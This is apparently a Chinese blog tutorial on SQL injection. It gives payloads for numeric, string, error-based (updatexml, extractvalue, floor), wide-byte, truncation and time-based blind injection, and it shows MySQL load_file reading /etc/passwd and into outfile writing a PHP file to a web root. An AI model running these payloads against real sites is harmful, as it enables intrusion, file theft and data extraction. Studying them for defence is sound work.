2. 程式人生 > >淺談SQL註入

淺談SQL註入

阿新 發佈:2018-10-31
數據 mat 三種 在服務器 packet roo 返回 version 查詢

先看一個sql語句:

select * from admin where username=‘(此處為用戶輸入的數據)‘;

在沒有任何過濾的情況下,如果用戶輸入:‘ or 1=1 --

這條語句就為:select * from admin where username=‘‘ or 1=1 --‘;

可見,語句執行永遠為真。此時就進行了sql註入。

SQL註入有如下分類:

一、數字型註入

初始參數為:id=1

可以構造:id=1 or 1=1 (語句執行永遠為真)

id=1 and 1=2 (語句執行永遠為假)

id=1‘ (語句執行會出錯)

數字型註入較為簡單,而且一般在PHP,ASP等弱類型語言中存在,而對於Java,C#等強類型語言一般不存在。

二、字符型註入

字符型註入首先想到的是閉合單引號。

不難想到:id=1‘ and 1=2 --

-- 是註釋後邊的語句。

三、其他註入

sql註入其實可以說就是字符型註入和數字型註入。

還有一些常見的註入,如:

POST註入:註入字段在POST數據中。

Cookie註入:註入字段在Cookie字段中。

延時註入:使用數據庫延時特性註入。

base64註入:註入字符串需要經過base64加密。

四、Mysql特性

mysql是一種數據庫。

(1)三種註釋:

#:註釋從“#”字符到行尾。

--:註釋“-- ”序列到行尾。註意:“-- ”後面要加一個空格。

/**/:註釋/* XXXX */中間的字符。

/**/註釋存在一個特點:select id /*!55555,username*/ from users

語句正常執行。/*!55555,username*/的意思是若Mysql版本號高於或者等於5.55.55,語句將會被執行。如果“!”後面不加入版本號,將直接執行sql語句。

(2)mysql函數利用

load_file()函數讀文件

讀取文件,文件必須在服務器上,文件必須為絕對路徑,必須有權限,文件容量小於 max_allowed_packet字節(默認為16MB,最大為1GB),如:

union select 1,load_file(‘/etc/passwd‘),3,4,5,6 #

繞過單引號:union select 1,load_file(字符串轉換為十六進制),3,4,5,6 #

union select 1,load_file(char(XX,XX,XX........)),3,4,5,6 # ascii碼

into outfile寫文件操作

必須持有權限,文件名為絕對路徑。

如:select ‘<?php phpinfo(); ?>‘ into file ‘c:\wwwroot\1.php‘

繞過單引號:select char(XX,XX,XX.......) into file ‘c:\wwwroot\1.php‘

concat 連接字符串

concat(user(),0x2c,database())

concat_ws(0x2c,user(),database()) 0x2c是 逗號的16進制。

五、Mysql報錯註入

(1)updatexml

select * from admin where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);

結果返回一個錯誤:‘|5.1.50-community-log‘

(2)extractvalue

select * from admin where id=1 and extractvalue(1,concat(0x7c,(select user())));

結果返回一個錯誤:‘|root@localhost‘

(3)floor

select * from admin where id = 1 union select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b

結果返回:Duplicate entry ‘1root@localhost‘ for key ‘group_key‘

六、寬字節註入

如果PHP開啟了魔術引號,就會將單引號,雙引號,反斜杠和NULL字符加上反斜杠轉義。

如:id=‘ 會輸出 \‘

這時我們可以使用寬字節註入:id=%d5‘ 輸出:誠‘ 註入成功。

我們將 誠 進行url編碼:%d5%5c

而 \的url編碼為:%5c 可見 ,繁體字將反斜杠吃掉了。這就是寬字節註入的原理。

七、長字符截斷

原理很簡單。

比如在數據庫創建三個如下用戶:

admin (有三個空格)

admin (有五個空格)

admin (有七個空格)

三個用戶名長度不一樣,但是如果 查詢admin用戶名,三個用戶名都會被查詢到。

假設後臺語句是:

select count(*) from users where username=‘admin‘ and password=‘******‘;

這是存在安全問題的,如果用戶創建一個“admin ”用戶,即可輕易進入後臺,著名的wordpress就被這樣的方式攻擊過。

八、延時註入

基於時間差異的盲註手段。延時註入需要用到sleep()函數。

如:select * from users where id = 1 and sleep(3) #三秒後執行sql語句。

也可以判斷是否存在註入:url+id=1 and sleep(3) 頁面三秒左右打開,則存在註入。

通常 會采用和 if 函數 搭配使用,進行爆破字符串。

如: and if(hex(mid(user(),L,1)))=N,sleep(3),1)

L的位置代表字符串的第幾個字符,N代表ASCII碼。

執行成功,則三秒左右返回頁面,否則,和原來相同。

ps:堅持,努力,為夢想奮鬥。

淺談SQL註入

相關推薦

SQL

數據 mat 三種 在服務器 packet roo 返回 version 查詢 先看一個sql語句: select * from admin where username=‘(此處為用戶輸入的數據)‘; 在沒有任何過濾的情況下,如果用戶輸入:‘ or 1=1 -- 這條語句

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

PDO防止SQL具體介紹

取代 能夠 article 數據庫 bsp 什麽 幫助 用戶 機會 <span style="font-size:18px;"><?php $dbh = new PDO("mysql:host=localhost; dbname=demo", "use

PHPCMS v9.6.0 wap模塊 SQL

sed injection update pytho see repl nbsp per pre 調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。 由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

【EF框架】使用params參數傳值防止SQL報錯處理

collect oar mapping cnblogs ken datetime nbsp .com src 通過SqlParameter傳時間參數,代碼如下: var param = new List<SqlParamete

另一種的SQL和DNS結合的技巧

其中 where ets 鏈接 是我 例如 .com bar 導致 這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。 本文章是理解於:http://netsecurity.51cto.com/art/2015

SQL1

put com mysq secure name 字符 html mit rom <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] &

mysql防SQL搜集

prepare case when sch pass 字符 ble 失敗 sqli 16進制 SQL註入 例:腳本邏輯 $sql = “SELECT * FROM user WHERE userid = $_GET[userid] “; 案例1:SELECT * F

Python防止sql

pan lec posit printf osi sqli jet usr operation 看了網上文章,說的都挺好的,給cursor.execute傳遞格式串和參數,就能防止註入,但是我寫了代碼,卻死活跑不通,懷疑自己用了一個假的python 最後,發現原因可能是

SQL之SQLmap入門

訪問控制 ret 當前 輸入 手動 ati 取數據 shc 3.2 http://www.freebuf.com/articles/web/29942.html 簡介 許多現實中對於網站的攻擊往往是由於網站沒有及時更新或者對於用戶的輸入沒有進行檢查。從緩沖區溢出

防止sql的函數addslashes()

php null str ges 定義 echo pre 註入 之前 1 <?php 2 $str = addslashes(‘Shanghai is the "biggest" city in China.‘); 3 echo($str); 4 ?> 定義

sqltips

註釋 ctf log 攔截 技術分享 執行 框架 哪裏 師傅 轉自http://www.wupco.cn/?p=3764 cuit 首先Web300 山水集團 第一步找到加密接口搭代理就不說了 接下來是註入,filter如下 這裏主要的難點在於如何按字節拆解返回的值,以完

ADO.NET 占位符(防SQL 攻擊)

microsoft 維護 text conn 提前 輸入密碼 sql 密碼 ati 當在添加程序中註入攻擊時在控制臺應用程序中可以這樣寫: 請輸入編號:U006 請輸入用戶名:無敵 請輸入密碼:1234 請輸入昵稱:呵呵 請輸入性別:True 請輸入生日:2000-1-1

記一次dvwa sql爆庫

dvwasql註入 python安裝 sqlmap安裝及使用 一 前期準備1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可https://www.python.org/2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機-&g

sql代碼解釋

6666某個網站的登錄驗證的SQL查詢代碼為:1strSQL = "SELECT * FROM users WHERE (name = ‘" + userName + "‘) and (pw = ‘"+ passWord +"‘);" 惡意填入2userName = "1‘ OR ‘1‘=‘1";與3pass

sql過程中後臺數據庫類型的三種判斷方式

sql註入 安全測試 數據庫類型判斷 後臺數據庫類型判斷:一、通過頁面返回的報錯信息,一般情況下頁面報錯會顯示是什麽數據庫類型,在此不多說;二、通過各個數據庫特有的數據表來判斷: 1、mssql數據庫 http://127.0.0.1/test.php?id=1 and (sele

4.簡單的sql

web安全 sql註入 ctf 實驗吧 根據頁面提示,到底過濾了什麽東西?可以知道一定過濾了什麽.... 分別輸入1,2,3有對應的結果 使用‘會報錯,於是 構造常用的sql語句:1‘ and ‘1‘=‘1 沒有反應試一試1‘ and ‘1‘=‘2